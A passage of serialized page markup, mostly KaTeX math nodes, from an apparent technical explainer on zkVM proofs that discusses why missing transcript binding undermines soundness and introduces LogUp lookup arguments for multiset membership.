Name":119638,"style":119625},[11333],[],{"type":27,"tag":207,"props":119641,"children":119644},{"className":119642,"style":119643},[119440],"left:-0.2355em;",[119645],{"type":27,"tag":207,"props":119646,"children":119648},{"className":119647,"style":119516},[119515,11342],[119649],{"type":27,"tag":41529,"props":119650,"children":119651},{"xmlns":119520,"width":119521,"height":119522,"style":119523,"viewBox":119524,"preserveAspectRatio":119525},[119652],{"type":27,"tag":119528,"props":119653,"children":119654},{"d":119530},[],{"type":27,"tag":207,"props":119656,"children":119658},{"className":119657},[11475,11342],[119659],{"type":33,"value":28967},{"type":27,"tag":207,"props":119661,"children":119663},{"className":119662},[28989,11342],[119664],{"type":33,"value":1322},{"type":27,"tag":207,"props":119666,"children":119668},{"className":119667},[11294,11342],[119669],{"type":33,"value":1660},{"type":27,"tag":207,"props":119671,"children":119673},{"className":119672},[11404,11342],[119674],{"type":33,"value":11407},{"type":27,"tag":207,"props":119676,"children":119678},{"className":119677},[11294,11342],[119679],{"type":33,"value":1651},{"type":27,"tag":207,"props":119681,"children":119683},{"className":119682},[29011,11342],[119684,119689],{"type":27,"tag":207,"props":119685,"children":119687},{"className":119686},[29011,11342],[119688],{"type":33,"value":41396},{"type":27,"tag":207,"props":119690,"children":119692},{"className":119691},[11309],[119693],{"type":27,"tag":207,"props":119694,"children":119696},{"className":119695},[11314],[119697],{"type":27,"tag":207,"props":119698,"children":119700},{"className":119699},[11319],[119701],{"type":27,"tag":207,"props":119702,"children":119705},{"className":119703,"style":119704},[11324],"height:0.5935em;",[119706],{"type":27,"tag":207,"props":119707,"children":119709},{"style":119708},"top:-2.786em;margin-right:0.0714em;",[119710,119714],{"type":27,"tag":207,"props":119711,"children":119713},{"className":119712,"style":116111},[11333],[],{"type":27,"tag":207,"props":119715,"children":119717},{"className":119716},[11339,116116,116117,11342],[119718],{"type":27,"tag":207,"props":119719,"children":119721},{"className":119720},[11294,28860,11342],[119722],{"type":33,"value":63637},{"type":27,"tag":207,"props":119724,"children":119726},{"className":119725},[29017],[119727],{"type":33,"value":29020},{"type":27,"tag":207,"props":119729,"children":119731},{"className":119730},[11319],[119732],{"type":27,"tag":207,"props":119733,"children":119736},{"className":119734,"style":119735},[11324],"height:0.5144em;",[119737],{"type":27,"tag":207,"props":119738,"children":119739},{},[],{"type":27,"tag":207,"props":119741,"children":119743},{"className":119742,"style":11411},[11372],[],{"type":27,"tag":207,"props":119745,"children":119747},{"className":119746,"style":102618},[11294,28860],[119748],{"type":33,"value":7596},{"type":27,"tag":207,"props":119750,"children":119752},{"className":119751},[28989],[119753],{"type":33,"value":1343},{"type":27,"tag":207,"props":119755,"children":119757},{"className":119756},[11294,119400],[119758],{"type":27,"tag":207,"props":119759,"children":119761},{"className":119760},[11314],[119762],{"type":27,"tag":207,"props":119763,"children":119765},{"className":119764},[11319],[119766],{"type":27,"tag":207,"props":119767,"children":119769},{"className":119768,"style":119616},[11324],[119770,119782],{"type":27,"tag":207,"props":119771,"children":119772},{"style":119417},[119773,119777],{"type":27,"tag":207,"props":119774,"children":119776},{"className":119775,"style":119422},[11333],[],{"type":27,"tag":207,"props":119778,"children":119780},{"className":119779},[11294,28860],[119781],{"type":33,"value":10512},{"type":27,"tag":207,"props":119783,"children":119785},{"style":119784},"top:-3.2634em;",[119786,119790],{"type":27,"tag":207,"props":119787,"children":119789},{"className":119788,"style":119422},[11333],[],{"type":27,"tag":207,"props":119791,"children":119793},{"className":119792,"style":119643},[119440],[119794],{"type":27,"tag":207,"props":119795,"children":119797},{"className":119796,"style":119516},[119515],[119798],{"type":27,"tag":41529,"props":119799,"children":119800},{"xmlns":119520,"width":119521,"height":119522,"style":119523,"viewBox":119524,"preserveAspectRatio":119525},[119801],{"type":27,"tag":119528,"props":119802,"children":119803},{"d":119530},[],{"type":27,"tag":207,"props":119805,"children":119807},{"className":119806},[29011],[119808],{"type":33,"value":10416},{"type":27,"tag":207,"props":119810,"children":119812},{"className":119811,"style":11373},[11372],[],{"type":27,"tag":207,"props":119814,"children":119816},{"className":119815},[11378],[119817],{"type":33,"value":118513},{"type":27,"tag":207,"props":119819,"children":119821},{"className":119820,"style":11373},[11372],[],{"type":27,"tag":207,"props":119823,"children":119825},{"className":119824},[11283],[119826,119831,119841,119846,119895,119900,119904,119953],{"type":27,"tag":207,"props":119827,"children":119830},{"className":119828,"style":119829},[11288],"height:1.2274em;vertical-align:-0.25em;",[],{"type":27,"tag":207,"props":119832,"children":119834},{"className":119833},[11294,33],[119835],{"type":27,"tag":207,"props":119836,"children":119838},{"className":119837},[11294],[119839],{"type":33,"value":119840},"eq",{"type":27,"tag":207,"props":119842,"children":119844},{"className":119843},[28989],[119845],{"type":33,"value":1343},{"type":27,"tag":207,"props":119847,"children":119849},{"className":119848},[11294,119400],[119850],{"type":27,"tag":207,"props":119851,"children":119853},{"className":119852},[11314],[119854],{"type":27,"tag":207,"props":119855,"children":119857},{"className":119856},[11319],[119858],{"type":27,"tag":207,"props":119859,"children":119861},{"className":119860,"style":119616},[11324],[119862,119874],{"type":27,"tag":207,"props":119863,"children":119864},{"style":119417},[119865,119869],{"type":27,"tag":207,"props":119866,"children":119868},{"className":119867,"style":119422},[11333],[],{"type":27,"tag":207,"props":119870,"children":119872},{"className":119871},[11294,28860],[119873],{"type":33,"value":10512},{"type":27,"tag":207,"props":119875,"children":119876},{"style":119784},[119877,119881],{"type":27,"tag":207,"props":119878,"children":119880},{"className":119879,"style":119422},[11333],[],{"type":27,"tag":207,"props":119882,"children":119884},{"className":119883,"style":119643},[119440],[119885],{"type":27,"tag":207,"props":119886,"children":119888},{"className":119887,"style":119516},[119515],[119889],{"type":27,"tag":41529,"props":119890,"children":119891},{"xmlns":119520,"width":119521,"height":119522,"style":119523,"viewBox":119524,"preserveAspectRatio":119525},[119892],{"type":27,"tag":119528,"props":119893,"children":119894},{"d":119530},[],{"type":27,"tag":207,"props":119896,"children":119898},{"className":119897},[11404],[119899],{"type":33,"value":11407},{"type":27,"tag":207,"props":119901,"children":119903},{"className":119902,"style":11411},[11372],[],{"type":27,"tag":207,"props":119905,"children":119907},{"className":119906},[11294,119400],[119908],{"type":27,"tag":207,"props":119909,"children":119911},{"className":119910},[11314],[119912],{"type":27,"tag":207,"props":119913,"children":119915},{"className":119914},[11319],[119916],{"type":27,"tag":207,"props":119917,"children":119919},{"className":119918,"style":119486},[11324],[119920,119932],{"type":27,"tag":207,"props":119921,"children":119922},{"style":119417},[119923,119927],{"type":27,"tag":207,"props":119924,"children":119926},{"className":119925,"style":119422},[11333],[],{"type":27,"tag":207,"props":119928,"children":119930},{"className":119929,"style":100264},[11294,28860],[119931],{"type":33,"value":101083},{"type":27,"tag":207,"props":119933,"children":119934},{"style":119417},[119935,119939],{"type":27,"tag":207,"props":119936,"children":119938},{"className":119937,"style":119422},[11333],[],{"type":27,"tag":207,"props":119940,"children":119942},{"className":119941,"style":119510},[119440],[119943],{"type":27,"tag":207,"props":119944,"children":119946},{"className":119945,"style":119516},[119515],[119947],{"type":27,"tag":41529,"props":119948,"children":119949},{"xmlns":119520,"width":119521,"height":119522,"style":119523,"viewBox":119524,"preserveAspectRatio":119525},[119950],{"type":27,"tag":119528,"props":119951,"children":119952},{"d":119530},[],{"type":27,"tag":207,"props":119954,"children":119956},{"className":119955},[29011],[119957],{"type":33,"value":10416},{"type":27,"tag":36,"props":119959,"children":119960},{},[119961,119963,120032,120034,120180,120182,120321,120323,120407],{"type":33,"value":119962},"At a fixed challenge point ",{"type":27,"tag":84,"props":119964,"children":119966},{"className":119965},[11266,11267],[119967],{"type":27,"tag":207,"props":119968,"children":119970},{"className":119969},[11272],[119971],{"type":27,"tag":207,"props":119972,"children":119974},{"className":119973,"ariaHidden":11278},[11277],[119975],{"type":27,"tag":207,"props":119976,"children":119978},{"className":119977},[11283],[119979,119983],{"type":27,"tag":207,"props":119980,"children":119982},{"className":119981,"style":119486},[11288],[],{"type":27,"tag":207,"props":119984,"children":119986},{"className":119985},[11294,119400],[119987],{"type":27,"tag":207,"props":119988,"children":119990},{"className":119989},[11314],[119991],{"type":27,"tag":207,"props":119992,"children":119994},{"className":119993},[11319],[119995],{"type":27,"tag":207,"props":119996,"children":119998},{"className":119997,"style":119486},[11324],[119999,120011],{"type":27,"tag":207,"props":120000,"children":120001},{"style":119417},[120002,120006],{"type":27,"tag":207,"props":120003,"children":120005},{"className":120004,"style":119422},[11333],[],{"type":27,"tag":207,"props":120007,"children":120009},{"className":120008,"style":100264},[11294,28860],[120010],{"type":33,"value":101083},{"type":27,"tag":207,"props":120012,"children":120013},{"style":119417},[120014,120018],{"type":27,"tag":207,"props":120015,"children":120017},{"className":120016,"style":119422},[11333],[],{"type":27,"tag":207,"props":120019,"children":120021},{"className":120020,"style":119510},[119440],[120022],{"type":27,"tag":207,"props":120023,"children":120025},{"className":120024,"style":119516},[119515],[120026],{"type":27,"tag":41529,"props":120027,"children":120028},{"xmlns":119520,"width":119521,"height":119522,"style":119523,"viewBox":119524,"preserveAspectRatio":119525},[120029],{"type":27,"tag":119528,"props":120030,"children":120031},{"d":119530},[],{"type":33,"value":120033},", the coefficients ",{"type":27,"tag":84,"props":120035,"children":120037},{"className":120036},[11266,11267],[120038],{"type":27,"tag":207,"props":120039,"children":120041},{"className":120040},[11272],[120042],{"type":27,"tag":207,"props":120043,"children":120045},{"className":120044,"ariaHidden":11278},[11277],[120046],{"type":27,"tag":207,"props":120047,"children":120049},{"className":120048},[11283],[120050,120054,120063,120068,120117,120122,120126,120175],{"type":27,"tag":207,"props":120051,"children":120053},{"className":120052,"style":119829},[11288],[],{"type":27,"tag":207,"props":120055,"children":120057},{"className":120056},[11294,33],[120058],{"type":27,"tag":207,"props":120059,"children":120061},{"className":120060},[11294],[120062],{"type":33,"value":119840},{"type":27,"tag":207,"props":120064,"children":120066},{"className":120065},[28989],[120067],{"type":33,"value":1343},{"type":27,"tag":207,"props":120069,"children":120071},{"className":120070},[11294,119400],[120072],{"type":27,"tag":207,"props":120073,"children":120075},{"className":120074},[11314],[120076],{"type":27,"tag":207,"props":120077,"children":120079},{"className":120078},[11319],[120080],{"type":27,"tag":207,"props":120081,"children":120083},{"className":120082,"style":119616},[11324],[120084,120096],{"type":27,"tag":207,"props":120085,"children":120086},{"style":119417},[120087,120091],{"type":27,"tag":207,"props":120088,"children":120090},{"className":120089,"style":119422},[11333],[],{"type":27,"tag":207,"props":120092,"children":120094},{"className":120093},[11294,28860],[120095],{"type":33,"value":10512},{"type":27,"tag":207,"props":120097,"children":120098},{"style":119784},[120099,120103],{"type":27,"tag":207,"props":120100,"children":120102},{"className":120101,"style":119422},[11333],[],{"type":27,"tag":207,"props":120104,"children":120106},{"className":120105,"style":119643},[119440],[120107],{"type":27,"tag":207,"props":120108,"children":120110},{"className":120109,"style":119516},[119515],[120111],{"type":27,"tag":41529,"props":120112,"children":120113},{"xmlns":119520,"width":119521,"height":119522,"style":119523,"viewBox":119524,"preserveAspectRatio":119525},[120114],{"type":27,"tag":119528,"props":120115,"children":120116},{"d":119530},[],{"type":27,"tag":207,"props":120118,"children":120120},{"className":120119},[11404],[120121],{"type":33,"value":11407},{"type":27,"tag":207,"props":120123,"children":120125},{"className":120124,"style":11411},[11372],[],{"type":27,"tag":207,"props":120127,"children":120129},{"className":120128},[11294,119400],[120130],{"type":27,"tag":207,"props":120131,"children":120133},{"className":120132},[11314],[120134],{"type":27,"tag":207,"props":120135,"children":120137},{"className":120136},[11319],[120138],{"type":27,"tag":207,"props":120139,"children":120141},{"className":120140,"style":119486},[11324],[120142,120154],{"type":27,"tag":207,"props":120143,"children":120144},{"style":119417},[120145,120149],{"type":27,"tag":207,"props":120146,"children":120148},{"className":120147,"style":119422},[11333],[],{"type":27,"tag":207,"props":120150,"children":120152},{"className":120151,"style":100264},[11294,28860],[120153],{"type":33,"value":101083},{"type":27,"tag":207,"props":120155,"children":120156},{"style":119417},[120157,120161],{"type":27,"tag":207,"props":120158,"children":120160},{"className":120159,"style":119422},[11333],[],{"type":27,"tag":207,"props":120162,"children":120164},{"className":120163,"style":119510},[119440],[120165],{"type":27,"tag":207,"props":120166,"children":120168},{"className":120167,"style":119516},[119515],[120169],{"type":27,"tag":41529,"props":120170,"children":120171},{"xmlns":119520,"width":119521,"height":119522,"style":119523,"viewBox":119524,"preserveAspectRatio":119525},[120172],{"type":27,"tag":119528,"props":120173,"children":120174},{"d":119530},[],{"type":27,"tag":207,"props":120176,"children":120178},{"className":120177},[29011],[120179],{"type":33,"value":10416},{"type":33,"value":120181}," are constants, so ",{"type":27,"tag":84,"props":120183,"children":120185},{"className":120184},[11266,11267],[120186],{"type":27,"tag":207,"props":120187,"children":120189},{"className":120188},[11272],[120190],{"type":27,"tag":207,"props":120191,"children":120193},{"className":120192,"ariaHidden":11278},[11277],[120194],{"type":27,"tag":207,"props":120195,"children":120197},{"className":120196},[11283],[120198,120202,120262,120267,120316],{"type":27,"tag":207,"props":120199,"children":120201},{"className":120200,"style":119395},[11288],[],{"type":27,"tag":207,"props":120203,"children":120205},{"className":120204},[11294,119400],[120206],{"type":27,"tag":207,"props":120207,"children":120209},{"className":120208},[11314,28914],[120210,120251],{"type":27,"tag":207,"props":120211,"children":120213},{"className":120212},[11319],[120214,120246],{"type":27,"tag":207,"props":120215,"children":120217},{"className":120216,"style":119413},[11324],[120218,120230],{"type":27,"tag":207,"props":120219,"children":120220},{"style":119417},[120221,120225],{"type":27,"tag":207,"props":120222,"children":120224},{"className":120223,"style":119422},[11333],[],{"type":27,"tag":207,"props":120226,"children":120228},{"className":120227,"style":102618},[11294,28860],[120229],{"type":33,"value":7596},{"type":27,"tag":207,"props":120231,"children":120232},{"style":119431},[120233,120237],{"type":27,"tag":207,"props":120234,"children":120236},{"className":120235,"style":119422},[11333],[],{"type":27,"tag":207,"props":120238,"children":120240},{"className":120239,"style":119441},[119440],[120241],{"type":27,"tag":207,"props":120242,"children":120244},{"className":120243},[11294],[120245],{"type":33,"value":119448},{"type":27,"tag":207,"props":120247,"children":120249},{"className":120248},[29017],[120250],{"type":33,"value":29020},{"type":27,"tag":207,"props":120252,"children":120254},{"className":120253},[11319],[120255],{"type":27,"tag":207,"props":120256,"children":120258},{"className":120257,"style":119461},[11324],[120259],{"type":27,"tag":207,"props":120260,"children":120261},{},[],{"type":27,"tag":207,"props":120263,"children":120265},{"className":120264},[28989],[120266],{"type":33,"value":1343},{"type":27,"tag":207,"props":120268,"children":120270},{"className":120269},[11294,119400],[120271],{"type":27,"tag":207,"props":120272,"children":120274},{"className":120273},[11314],[120275],{"type":27,"tag":207,"props":120276,"children":120278},{"className":120277},[11319],[120279],{"type":27,"tag":207,"props":120280,"children":120282},{"className":120281,"style":119486},[11324],[120283,120295],{"type":27,"tag":207,"props":120284,"children":120285},{"style":119417},[120286,120290],{"type":27,"tag":207,"props":120287,"children":120289},{"className":120288,"style":119422},[11333],[],{"type":27,"tag":207,"props":120291,"children":120293},{"className":120292,"style":100264},[11294,28860],[120294],{"type":33,"value":101083},{"type":27,"tag":207,"props":120296,"children":120297},{"style":119417},[120298,120302],{"type":27,"tag":207,"props":120299,"children":120301},{"className":120300,"style":119422},[11333],[],{"type":27,"tag":207,"props":120303,"children":120305},{"className":120304,"style":119510},[119440],[120306],{"type":27,"tag":207,"props":120307,"children":120309},{"className":120308,"style":119516},[119515],[120310],{"type":27,"tag":41529,"props":120311,"children":120312},{"xmlns":119520,"width":119521,"height":119522,"style":119523,"viewBox":119524,"preserveAspectRatio":119525},[120313],{"type":27,"tag":119528,"props":120314,"children":120315},{"d":119530},[],{"type":27,"tag":207,"props":120317,"children":120319},{"className":120318},[29011],[120320],{"type":33,"value":10416},{"type":33,"value":120322}," is linear in the table values ",{"type":27,"tag":84,"props":120324,"children":120326},{"className":120325},[11266,11267],[120327],{"type":27,"tag":207,"props":120328,"children":120330},{"className":120329},[11272],[120331],{"type":27,"tag":207,"props":120332,"children":120334},{"className":120333,"ariaHidden":11278},[11277],[120335],{"type":27,"tag":207,"props":120336,"children":120338},{"className":120337},[11283],[120339,120343,120348,120353,120402],{"type":27,"tag":207,"props":120340,"children":120342},{"className":120341,"style":119829},[11288],[],{"type":27,"tag":207,"props":120344,"children":120346},{"className":120345,"style":102618},[11294,28860],[120347],{"type":33,"value":7596},{"type":27,"tag":207,"props":120349,"children":120351},{"className":120350},[28989],[120352],{"type":33,"value":1343},{"type":27,"tag":207,"props":120354,"children":120356},{"className":120355},[11294,119400],[120357],{"type":27,"tag":207,"props":120358,"children":120360},{"className":120359},[11314],[120361],{"type":27,"tag":207,"props":120362,"children":120364},{"className":120363},[11319],[120365],{"type":27,"tag":207,"props":120366,"children":120368},{"className":120367,"style":119616},[11324],[120369,120381],{"type":27,"tag":207,"props":120370,"children":120371},{"style":119417},[120372,120376],{"type":27,"tag":207,"props":120373,"children":120375},{"className":120374,"style":119422},[11333],[],{"type":27,"tag":207,"props":120377,"children":120379},{"className":120378},[11294,28860],[120380],{"type":33,"value":10512},{"type":27,"tag":207,"props":120382,"children":120383},{"style":119784},[120384,120388],{"type":27,"tag":207,"props":120385,"children":120387},{"className":120386,"style":119422},[11333],[],{"type":27,"tag":207,"props":120389,"children":120391},{"className":120390,"style":119643},[119440],[120392],{"type":27,"tag":207,"props":120393,"children":120395},{"className":120394,"style":119516},[119515],[120396],{"type":27,"tag":41529,"props":120397,"children":120398},{"xmlns":119520,"width":119521,"height":119522,"style":119523,"viewBox":119524,"preserveAspectRatio":119525},[120399],{"type":27,"tag":119528,"props":120400,"children":120401},{"d":119530},[],{"type":27,"tag":207,"props":120403,"children":120405},{"className":120404},[29011],[120406],{"type":33,"value":10416},{"type":33,"value":1041},{"type":27,"tag":36,"props":120409,"children":120410},{},[120411,120413,120482],{"type":33,"value":120412},"That linearity is exactly why missing transcript binding is dangerous: if ",{"type":27,"tag":84,"props":120414,"children":120416},{"className":120415},[11266,11267],[120417],{"type":27,"tag":207,"props":120418,"children":120420},{"className":120419},[11272],[120421],{"type":27,"tag":207,"props":120422,"children":120424},{"className":120423,"ariaHidden":11278},[11277],[120425],{"type":27,"tag":207,"props":120426,"children":120428},{"className":120427},[11283],[120429,120433],{"type":27,"tag":207,"props":120430,"children":120432},{"className":120431,"style":119486},[11288],[],{"type":27,"tag":207,"props":120434,"children":120436},{"className":120435},[11294,119400],[120437],{"type":27,"tag":207,"props":120438,"children":120440},{"className":120439},[11314],[120441],{"type":27,"tag":207,"props":120442,"children":120444},{"className":120443},[11319],[120445],{"type":27,"tag":207,"props":120446,"children":120448},{"className":120447,"style":119486},[11324],[120449,120461],{"type":27,"tag":207,"props":120450,"children":120451},{"style":119417},[120452,120456],{"type":27,"tag":207,"props":120453,"children":120455},{"className":120454,"style":119422},[11333],[],{"type":27,"tag":207,"props":120457,"children":120459},{"className":120458,"style":100264},[11294,28860],[120460],{"type":33,"value":101083},{"type":27,"tag":207,"props":120462,"children":120463},{"style":119417},[120464,120468],{"type":27,"tag":207,"props":120465,"children":120467},{"className":120466,"style":119422},[11333],[],{"type":27,"tag":207,"props":120469,"children":120471},{"className":120470,"style":119510},[119440],[120472],{"type":27,"tag":207,"props":120473,"children":120475},{"className":120474,"style":119516},[119515],[120476],{"type":27,"tag":41529,"props":120477,"children":120478},{"xmlns":119520,"width":119521,"height":119522,"style":119523,"viewBox":119524,"preserveAspectRatio":119525},[120479],{"type":27,"tag":119528,"props":120480,"children":120481},{"d":119530},[],{"type":33,"value":120483}," is sampled before those values are bound, an attacker can reprogram values while preserving the same evaluated claim.",{"type":27,"tag":58,"props":120485,"children":120487},{"id":120486},"lookup-arguments-logup",[120488],{"type":33,"value":120489},"Lookup Arguments (LogUp)",{"type":27,"tag":36,"props":120491,"children":120492},{},[120493],{"type":33,"value":120494},"zkVMs need to check that values satisfy certain properties. For example:",{"type":27,"tag":1228,"props":120496,"children":120497},{},[120498,120554,120559],{"type":27,"tag":1232,"props":120499,"children":120500},{},[120501,120503,120553],{"type":33,"value":120502},"Is this byte in range ",{"type":27,"tag":84,"props":120504,"children":120506},{"className":120505},[11266,11267],[120507],{"type":27,"tag":207,"props":120508,"children":120510},{"className":120509},[11272],[120511],{"type":27,"tag":207,"props":120512,"children":120514},{"className":120513,"ariaHidden":11278},[11277],[120515],{"type":27,"tag":207,"props":120516,"children":120518},{"className":120517},[11283],[120519,120523,120528,120533,120538,120542,120548],{"type":27,"tag":207,"props":120520,"children":120522},{"className":120521,"style":11393},[11288],[],{"type":27,"tag":207,"props":120524,"children":120526},{"className":120525},[28989],[120527],{"type":33,"value":11019},{"type":27,"tag":207,"props":120529,"children":120531},{"className":120530},[11294],[120532],{"type":33,"value":1660},{"type":27,"tag":207,"props":120534,"children":120536},{"className":120535},[11404],[120537],{"type":33,"value":11407},{"type":27,"tag":207,"props":120539,"children":120541},{"className":120540,"style":11411},[11372],[],{"type":27,"tag":207,"props":120543,"children":120545},{"className":120544},[11294],[120546],{"type":33,"value":120547},"255",{"type":27,"tag":207,"props":120549,"children":120551},{"className":120550},[29011],[120552],{"type":33,"value":22686},{"type":33,"value":10444},{"type":27,"tag":1232,"props":120555,"children":120556},{},[120557],{"type":33,"value":120558},"Does this opcode decode correctly?",{"type":27,"tag":1232,"props":120560,"children":120561},{},[120562],{"type":33,"value":120563},"Is this memory access consistent with previous accesses?",{"type":27,"tag":36,"props":120565,"children":120566},{},[120567,120572],{"type":27,"tag":12606,"props":120568,"children":120569},{},[120570],{"type":33,"value":120571},"The naive approach:",{"type":33,"value":120573}," Add constraints for each check. Expensive.",{"type":27,"tag":36,"props":120575,"children":120576},{},[120577,120582,120584,120589],{"type":27,"tag":12606,"props":120578,"children":120579},{},[120580],{"type":33,"value":120581},"The clever approach:",{"type":33,"value":120583}," Precompute a table of valid tuples. Prove that every value the program uses appears in the table. This is a ",{"type":27,"tag":12606,"props":120585,"children":120586},{},[120587],{"type":33,"value":120588},"multiset membership",{"type":33,"value":75029},{"type":27,"tag":36,"props":120591,"children":120592},{},[120593,120598],{"type":27,"tag":12606,"props":120594,"children":120595},{},[120596],{"type":33,"value":120597},"LogUp (Logarithmic Derivative):",{"type":33,"value":120599}," Encode multiset membership as a sum of fractions.",{"type":27,"tag":36,"props":120601,"children":120602},{},[120603,120605,120630,120632,120659],{"type":33,"value":120604},"If set ",{"type":27,"tag":84,"props":120606,"children":120608},{"className":120607},[11266,11267],[120609],{"type":27,"tag":207,"props":120610,"children":120612},{"className":120611},[11272],[120613],{"type":27,"tag":207,"props":120614,"children":120616},{"className":120615,"ariaHidden":11278},[11277],[120617],{"type":27,"tag":207,"props":120618,"children":120620},{"className":120619},[11283],[120621,120625],{"type":27,"tag":207,"props":120622,"children":120624},{"className":120623,"style":28855},[11288],[],{"type":27,"tag":207,"props":120626,"children":120628},{"className":120627},[11294,28860],[120629],{"type":33,"value":83998},{"type":33,"value":120631}," should equal set ",{"type":27,"tag":84,"props":120633,"children":120635},{"className":120634},[11266,11267],[120636],{"type":27,"tag":207,"props":120637,"children":120639},{"className":120638},[11272],[120640],{"type":27,"tag":207,"props":120641,"children":120643},{"className":120642,"ariaHidden":11278},[11277],[120644],{"type":27,"tag":207,"props":120645,"children":120647},{"className":120646},[11283],[120648,120652],{"type":27,"tag":207,"props":120649,"children":120651},{"className":120650,"style":28855},[11288],[],{"type":27,"tag":207,"props":120653,"children":120656},{"className":120654,"style":120655},[11294,28860],"margin-right:0.05017em;",[120657],{"type":33,"value":120658},"B",{"type":33,"value":120660}," as multisets:",{"type":27,"tag":36,"props":120662,"children":120663},{},[120664],{"type":27,"tag":84,"props":120665,"children":120667},{"className":120666},[11266,11267],[120668],{"type":27,"tag":207,"props":120669,"children":120671},{"className":120670},[11272],[120672],{"type":27,"tag":207,"props":120673,"children":120675},{"className":120674,"ariaHidden":11278},[11277],[120676,120891],{"type":27,"tag":207,"props":120677,"children":120679},{"className":120678},[11283],[120680,120685,120758,120762,120878,120882,120887],{"type":27,"tag":207,"props":120681,"children":120684},{"className":120682,"style":120683},[11288],"height:1.2484em;vertical-align:-0.4033em;",[],{"type":27,"tag":207,"props":120686,"children":120688},{"className":120687},[28896],[120689,120694],{"type":27,"tag":207,"props":120690,"children":120692},{"className":120691,"style":28903},[28896,28901,28902],[120693],{"type":33,"value":116046},{"type":27,"tag":207,"props":120695,"children":120697},{"className":120696},[11309],[120698],{"type":27,"tag":207,"props":120699,"children":120701},{"className":120700},[11314,28914],[120702,120746],{"type":27,"tag":207,"props":120703,"children":120705},{"className":120704},[11319],[120706,120741],{"type":27,"tag":207,"props":120707,"children":120710},{"className":120708,"style":120709},[11324],"height:0.1786em;",[120711],{"type":27,"tag":207,"props":120712,"children":120713},{"style":28927},[120714,120718],{"type":27,"tag":207,"props":120715,"children":120717},{"className":120716,"style":11334},[11333],[],{"type":27,"tag":207,"props":120719,"children":120721},{"className":120720},[11339,11340,11341,11342],[120722],{"type":27,"tag":207,"props":120723,"children":120725},{"className":120724},[11294,11342],[120726,120731,120736],{"type":27,"tag":207,"props":120727,"children":120729},{"className":120728},[11294,28860,11342],[120730],{"type":33,"value":47},{"type":27,"tag":207,"props":120732,"children":120734},{"className":120733},[11475,11342],[120735],{"type":33,"value":28967},{"type":27,"tag":207,"props":120737,"children":120739},{"className":120738},[11294,28860,11342],[120740],{"type":33,"value":83998},{"type":27,"tag":207,"props":120742,"children":120744},{"className":120743},[29017],[120745],{"type":33,"value":29020},{"type":27,"tag":207,"props":120747,"children":120749},{"className":120748},[11319],[120750],{"type":27,"tag":207,"props":120751,"children":120754},{"className":120752,"style":120753},[11324],"height:0.3271em;",[120755],{"type":27,"tag":207,"props":120756,"children":120757},{},[],{"type":27,"tag":207,"props":120759,"children":120761},{"className":120760,"style":11411},[11372],[],{"type":27,"tag":207,"props":120763,"children":120765},{"className":120764},[11294],[120766,120771,120874],{"type":27,"tag":207,"props":120767,"children":120770},{"className":120768},[28989,120769],"nulldelimiter",[],{"type":27,"tag":207,"props":120772,"children":120775},{"className":120773},[120774],"mfrac",[120776],{"type":27,"tag":207,"props":120777,"children":120779},{"className":120778},[11314,28914],[120780,120862],{"type":27,"tag":207,"props":120781,"children":120783},{"className":120782},[11319],[120784,120857],{"type":27,"tag":207,"props":120785,"children":120788},{"className":120786,"style":120787},[11324],"height:0.8451em;",[120789,120822,120836],{"type":27,"tag":207,"props":120790,"children":120792},{"style":120791},"top:-2.655em;",[120793,120797],{"type":27,"tag":207,"props":120794,"children":120796},{"className":120795,"style":119422},[11333],[],{"type":27,"tag":207,"props":120798,"children":120800},{"className":120799},[11339,11340,11341,11342],[120801],{"type":27,"tag":207,"props":120802,"children":120804},{"className":120803},[11294,11342],[120805,120812,120817],{"type":27,"tag":207,"props":120806,"children":120809},{"className":120807,"style":120808},[11294,28860,11342],"margin-right:0.04398em;",[120810],{"type":33,"value":120811},"z",{"type":27,"tag":207,"props":120813,"children":120815},{"className":120814},[11378,11342],[120816],{"type":33,"value":11353},{"type":27,"tag":207,"props":120818,"children":120820},{"className":120819},[11294,28860,11342],[120821],{"type":33,"value":47},{"type":27,"tag":207,"props":120823,"children":120825},{"style":120824},"top:-3.23em;",[120826,120830],{"type":27,"tag":207,"props":120827,"children":120829},{"className":120828,"style":119422},[11333],[],{"type":27,"tag":207,"props":120831,"children":120835},{"className":120832,"style":120834},[120833],"frac-line","border-bottom-width:0.04em;",[],{"type":27,"tag":207,"props":120837,"children":120839},{"style":120838},"top:-3.394em;",[120840,120844],{"type":27,"tag":207,"props":120841,"children":120843},{"className":120842,"style":119422},[11333],[],{"type":27,"tag":207,"props":120845,"children":120847},{"className":120846},[11339,11340,11341,11342],[120848],{"type":27,"tag":207,"props":120849,"children":120851},{"className":120850},[11294,11342],[120852],{"type":27,"tag":207,"props":120853,"children":120855},{"className":120854},[11294,11342],[120856],{"type":33,"value":1651},{"type":27,"tag":207,"props":120858,"children":120860},{"className":120859},[29017],[120861],{"type":33,"value":29020},{"type":27,"tag":207,"props":120863,"children":120865},{"className":120864},[11319],[120866],{"type":27,"tag":207,"props":120867,"children":120870},{"className":120868,"style":120869},[11324],"height:0.4033em;",[120871],{"type":27,"tag":207,"props":120872,"children":120873},{},[],{"type":27,"tag":207,"props":120875,"children":120877},{"className":120876},[29011,120769],[],{"type":27,"tag":207,"props":120879,"children":120881},{"className":120880,"style":11470},[11372],[],{"type":27,"tag":207,"props":120883,"children":120885},{"className":120884},[11475],[120886],{"type":33,"value":10380},{"type":27,"tag":207,"props":120888,"children":120890},{"className":120889,"style":11470},[11372],[],{"type":27,"tag":207,"props":120892,"children":120894},{"className":120893},[11283],[120895,120899,120971,120975],{"type":27,"tag":207,"props":120896,"children":120898},{"className":120897,"style":120683},[11288],[],{"type":27,"tag":207,"props":120900,"children":120902},{"className":120901},[28896],[120903,120908],{"type":27,"tag":207,"props":120904,"children":120906},{"className":120905,"style":28903},[28896,28901,28902],[120907],{"type":33,"value":116046},{"type":27,"tag":207,"props":120909,"children":120911},{"className":120910},[11309],[120912],{"type":27,"tag":207,"props":120913,"children":120915},{"className":120914},[11314,28914],[120916,120960],{"type":27,"tag":207,"props":120917,"children":120919},{"className":120918},[11319],[120920,120955],{"type":27,"tag":207,"props":120921,"children":120924},{"className":120922,"style":120923},[11324],"height:0.1864em;",[120925],{"type":27,"tag":207,"props":120926,"children":120927},{"style":28927},[120928,120932],{"type":27,"tag":207,"props":120929,"children":120931},{"className":120930,"style":11334},[11333],[],{"type":27,"tag":207,"props":120933,"children":120935},{"className":120934},[11339,11340,11341,11342],[120936],{"type":27,"tag":207,"props":120937,"children":120939},{"className":120938},[11294,11342],[120940,120945,120950],{"type":27,"tag":207,"props":120941,"children":120943},{"className":120942},[11294,28860,11342],[120944],{"type":33,"value":10512},{"type":27,"tag":20